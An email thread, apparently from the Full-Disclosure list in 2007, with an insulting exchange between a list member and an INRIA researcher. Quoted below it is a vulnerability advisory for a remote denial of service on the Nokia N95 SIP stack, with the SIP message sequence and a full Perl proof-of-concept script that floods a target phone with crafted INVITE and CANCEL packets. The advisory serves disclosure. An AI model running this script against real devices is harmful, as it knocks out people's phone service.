<a href="http://hal.inria.fr/index.php?view_this_doc=inria-00172056&extended_view=1&version=&halsid=5561bd637e62791f1744a158d907343a">http://hal.inria.fr/index.php?view_this_doc=inria-00172056&extended_view=1&version=&halsid=5561bd637e62791f1744a158d907343a
</a><br><br>Could you please send me this document so i can learn from you how to nmap? I would very much appreciate reading this paper so I can learn the basics of a high level pen test.<br><br><a href="http://hal.inria.fr/inria-00168415/fr/">
http://hal.inria.fr/inria-00168415/fr/</a><br><br>I would also love this paper. Based on the times you mention the word "model" and "proven" it seems your product must be better then selinux itself.<br>
<br>The rest of your papers were modeled around mobile ad-hoc networks and "key managment in blah blah" which are areas generally reserved for academics who cannot publish anything useful so it seems appropriate that the bulk of your publications are in this field.
<br><br><br><br><br><div class="gmail_quote">On Dec 5, 2007 1:57 PM, <<a href="mailto:state@loria.fr">state@loria.fr</a>> wrote:<br><blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">
hi Reepex,<br><br>I do not understand why are frustrated about a computer science degree. Maybe,<br>someone got dropped out of a degree programm and some psychological trauma gets<br> activated when seeing a Ph.D?<br><br>
If you like it or not, in order to get a computer science degree, you will have<br>to take classes, and most classes are taught by Ph.Ds.<br><br>I will not argue with you on why I use the Ph.D in my signature, but if you
<br>really want to know, look at our research papers published in academic<br>journals/conferences. (If you do not find them, I can send them to you).<br>If you will ever understand the contents, then you will understand what are our
<br>credentials..:) This will probably never happen.<br><br>At least, I use a signature and a real name and do not hide behind a gmail<br>account.<br><br>Meanwhile try yourself to find at least one vulnerability and enjoy Perl
<br>programming, it seemes your computer science skills are somehow in this area :)<br><br><br>Greetings<br><br><br><br><br>RS<br><br><br>Selon reepex <<a href="mailto:reepex@gmail.com">reepex@gmail.com</a>>:<br><div>
<div></div><div class="Wj3C7c"><br>> So almighty Phd what is your thesis exactly?<br>><br>> To me it seems to be 'how to run a fuzzer then write crappy perl scripts<br>> to exploit DoS conditions'<br>
><br>> does this properly summarize your phd credentials?<br>><br>> I guess you could tack on 'after writing the crappy scripts, flood mailing<br>> lists with our crap, and get made fun of'<br>>
<br>> I am sure you will serve the academic community great one day when teach<br>> "hacking" classes revolving around the latest editions of hacking exposed<br>><br>><br>><br>> On Dec 5, 2007 11:05 AM, Radu State <
<a href="mailto:State@loria.fr">State@loria.fr</a>> wrote:<br>><br>> > Nokia N95 cellphone remote DoS using the SIP Stack<br>> ><br>> ><br>> ><br>> > Severity:<br>> ><br>> > High – Denial of Service
<br>> ><br>> ><br>> ><br>> > Hardware:<br>> ><br>> > Nokia N95<br>> ><br>> ><br>> ><br>> > Firmware:<br>> ><br>> > Tested version: Nokia RM-159 V 12.0.013
<br>> ><br>> ><br>> ><br>> > Notification:<br>> ><br>> > Vulnerability found: 11 September 2007<br>> ><br>> > Contact Nokia Support: 12 September 2007 / None reply Contact Nokia
<br>> > Security Support: 19 September 2007 / None reply<br>> ><br>> ><br>> ><br>> > Vulnerability Synopsis:<br>> ><br>> > If the device has the SIP Phone client activated, a sequence of SIP
<br>> > messages turn the device in an inconsistent state where the user is not<br>> able<br>> > to operate it anymore until it reboots.<br>> ><br>> ><br>> ><br>> > The sequence of messages consists in 2 different SIP Dialogs where the
<br>> > first initiates an INVITE transaction but immediately closes it (in an<br>> > anticipated manner). While, the second transaction initiates a normal<br>> INVITE<br>> > transaction that trigger the vulnerability of the target.
<br>> ><br>> ><br>> ><br>> > The sequence of messages is illustrated below.<br>> ><br>> ><br>> ><br>> > X ------------------------- INVITE -----------------------> Nokiav12
<br>> ><br>> > X <---------------------- 100 Trying ---------------------- Nokiav12<br>> ><br>> > X ------------------------- CANCEL -----------------------> Nokiav12<br>> ><br>> > X <----------------- OK (to the Cancel) ------------------- Nokiav12
<br>> ><br>> > X <---------------- 487 Request Terminated ---------------- Nokiav12<br>> ><br>> ><br>> ><br>> > --------New Dialog--------<br>> ><br>> ><br>> ><br>
> > X ------------------------- INVITE -----------------------> Nokiav12<br>> ><br>> > X <---------------------- 100 Trying ---------------------- Nokiav12<br>> ><br>> > X <---------------------- 180 Trying ---------------------- Nokiav12
<br>> ><br>> ><br>> ><br>> > ---- The device does not work properly anymore ----<br>> ><br>> ><br>> ><br>> > Impact:<br>> ><br>> > A remote entity can take down all the services of the cell phone
<br>> ><br>> ><br>> ><br>> > Resolution:<br>> ><br>> > As we did not get any proper reply from Nokia about the subject, the best<br>> > way will be to disable the SIP Client<br>> >
<br>> ><br>> ><br>> > Credits:<br>> ><br>> > Humberto J. Abdelnur (Ph.D Student)<br>> ><br>> > Radu State (Ph.D)<br>> ><br>> > Olivier Festor (Ph.D)<br>> ><br>> >
<br>> ><br>> > This vulnerability was identified by the Madynes research team at INRIA<br>> > Lorraine, using KiF the Madynes VoIP fuzzer.<br>> ><br>> > <a href="http://madynes.loria.fr/" target="_blank">
http://madynes.loria.fr/</a><br>> ><br>> ><br>> ><br>> ><br>> ><br>> > Proof of Concept:<br>> ><br>> ><br>> ><br>> > A perl script (nokiav12.pl) is attached to this mail. Before launching
<br>> ><br>> > it, the SIP phone has to be initialed in the target device<br>> ><br>> ><br>> ><br>> > Command:<br>> ><br>> > perl nokiav12.pl <dst_IP> <username> <SourceIp> <SourceUsername>
<br>> ><br>> ><br>> ><br>> > Eg. perl nokiav12.pl <a href="http://192.168.1.119" target="_blank">192.168.1.119</a> lupilu <a href="http://192.168.1.2" target="_blank">192.168.1.2</a> tucu<br>> >
<br>> ><br>> ><br>> ><br>> ><br>> > #!/usr/bin/perl<br>> ><br>> ><br>> ><br>> > ##################################################<br>> ><br>> > # Vulnerabily discovered using KiF ~ Kiph #
<br>> ><br>> > # #<br>> ><br>> > # Authors: #<br>> ><br>> > # Humberto J. Abdelnur (Ph.D Student) #<br>> ><br>> > # Radu State (Ph.D) #<br>> ><br>> > # Olivier Festor (
Ph.D) #<br>> ><br>> > # #<br>> ><br>> > # Madynes Team, LORIA - INRIA Lorraine #<br>> ><br>> > # <a href="http://madynes.loria.fr" target="_blank">http://madynes.loria.fr</a> #<br>> >
<br>> > ##################################################<br>> ><br>> ><br>> ><br>> > use IO::Socket::INET;<br>> ><br>> > use String::Random;<br>> ><br>> ><br>> >
<br>> > die "Usage $0 <targetIP> <targetUser> <attackerIP> <attackerUser>"<br>> ><br>> > unless ($ARGV[3]);<br>> ><br>> ><br>> ><br>> > $targetUser = $ARGV[1];
<br>> ><br>> > $targetIP = $ARGV[0];<br>> ><br>> ><br>> ><br>> > $attackerUser = $ARGV[3];<br>> ><br>> > $attackerIP= $ARGV[2];<br>> ><br>> ><br>> ><br>> > $socket=new IO::Socket::INET->new(
<br>> ><br>> > Proto=>'udp',<br>> ><br>> > PeerPort=>5060,<br>> ><br>> > PeerAddr=>$targetIP,<br>> ><br>> > LocalPort=>5060);<br>> ><br>> ><br>
> ><br>> > $foo = new String::Random;<br>> ><br>> > $callid= $foo->randpattern("CCccnCn");<br>> ><br>> > $cseq = $foo->randregex('\d\d\d\d');<br>> ><br>> >
<br>> ><br>> > $sdp = "v=0\r<br>> ><br>> > o=Lupilu 63356722367567875 63356722367567875 IN IP4 $attackerIP\r<br>> ><br>> > s=-\r<br>> ><br>> > c=IN IP4 $attackerIP\r<br>
> ><br>> > t=0 0\r<br>> ><br>> > m=audio 49152 RTP/AVP 96 0 8 97 18 98 13\r<br>> ><br>> > a=sendrecv\r<br>> ><br>> > a=ptime:20\r<br>> ><br>> > a=maxptime:200\r<br>
> ><br>> > a=fmtp:96 mode-change-neighbor=1\r<br>> ><br>> > a=fmtp:18 annexb=no\r<br>> ><br>> > a=fmtp:98 0-15\r<br>> ><br>> > a=rtpmap:96 AMR/8000/1\r<br>> ><br>> > a=rtpmap:0 PCMU/8000/1\r
<br>> ><br>> > a=rtpmap:8 PCMA/8000/1\r<br>> ><br>> > a=rtpmap:97 iLBC/8000/1\r<br>> ><br>> > a=rtpmap:18 G729/8000/1\r<br>> ><br>> > a=rtpmap:98 telephone-event/8000/1\r<br>
> ><br>> > a=rtpmap:13 CN/8000/1\r<br>> ><br>> > ";<br>> ><br>> ><br>> ><br>> > $sdplen= length $sdp;<br>> ><br>> ><br>> ><br>> > $msg = "INVITE sip:$targetUser\@$targetIP SIP/2.0\r
<br>> ><br>> > Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r<br>> ><br>> > From: <sip:$attackerUser\@$attackerIP>;tag=1\r<br>> ><br>> > To: <sip:$targetUser\@$targetIP>\r<br>
> ><br>> > Call-ID: $callid\@$attackerIP\r<br>> ><br>> > CSeq: $cseq INVITE\r<br>> ><br>> > Max-Forwards: 70\r<br>> ><br>> > Contact: <sip:$attackerUser\@$attackerIP>\r
<br>> ><br>> > Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY,<br>> ><br>> > MESSAGE\r<br>> ><br>> > Content-Type: application/sdp\r<br>> ><br>> > Content-Length: $sdplen\r
<br>> ><br>> > \r<br>> ><br>> > $sdp";<br>> ><br>> > $socket->send($msg);<br>> ><br>> > $text = '';<br>> ><br>> > while (not $text =~ /^SIP\/2.0 100(.\r\n)*/ ){
<br>> ><br>> > $socket->recv($text,1024,0);<br>> ><br>> > }<br>> ><br>> ><br>> ><br>> > $msg = "CANCEL sip:$targetUser\@$targetIP SIP/2.0\r<br>> ><br>> > Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r
<br>> ><br>> > From: <sip:$attackerUser\@$attackerIP>;tag=1\r<br>> ><br>> > To: <sip:$targetUser\@$targetIP>;tag=1\r<br>> ><br>> > Call-ID: $callid\@$attackerIP\r<br>> >
<br>> > CSeq: $cseq CANCEL\r<br>> ><br>> > Max-Forwards: 70\r<br>> ><br>> > Content-Length: 0\r<br>> ><br>> > \r<br>> ><br>> > ";<br>> ><br>> > $socket->send($msg);
<br>> ><br>> > time.sleep(1);<br>> ><br>> > $callid= $foo->randpattern("CCccnCn");<br>> ><br>> > $cseq = $foo->randregex('\d\d\d\d');<br>> ><br>> > $msg = "INVITE sip:$targetUser\@$targetIP SIP/2.0\r
<br>> ><br>> > Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK2\r<br>> ><br>> > From: <sip:$attackerUser\@$attackerIP>;tag=2\r<br>> ><br>> > To: <sip:$targetUser\@$targetIP>\r<br>
> ><br>> > Call-ID: $callid\@$attackerIP\r<br>> ><br>> > CSeq: $cseq INVITE\r<br>> ><br>> > Contact: <sip:$attackerUser\@$attackerIP>\r<br>> ><br>> > Max-Forwards: 70\r
<br>> ><br>> > Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY,<br>> ><br>> > MESSAGE\r<br>> ><br>> > Content-Type: application/sdp\r<br>> ><br>> > Content-Length: $sdplen\r
<br>> ><br>> > \r<br>> ><br>> > $sdp";<br>> ><br>> > $socket->send($msg);<br>> ><br>> ><br>> ><br>> ><br>> ><br>> ><br>> ><br>> > No virus found in this outgoing message.
<br>> > Checked by AVG Free Edition.<br>> > Version: 7.5.503 / Virus Database: 269.16.14/1171 - Release Date:<br>> > 04/12/2007 19:31<br>> ><br>> > _______________________________________________
<br>> > Full-Disclosure - We believe in it.<br>> > Charter: <a href="http://lists.grok.org.uk/full-disclosure-charter.html" target="_blank">http://lists.grok.org.uk/full-disclosure-charter.html</a><br>> > Hosted and sponsored by Secunia -
<a href="http://secunia.com/" target="_blank">http://secunia.com/</a><br>> ><br>><br><br><br></div></div></blockquote></div><br>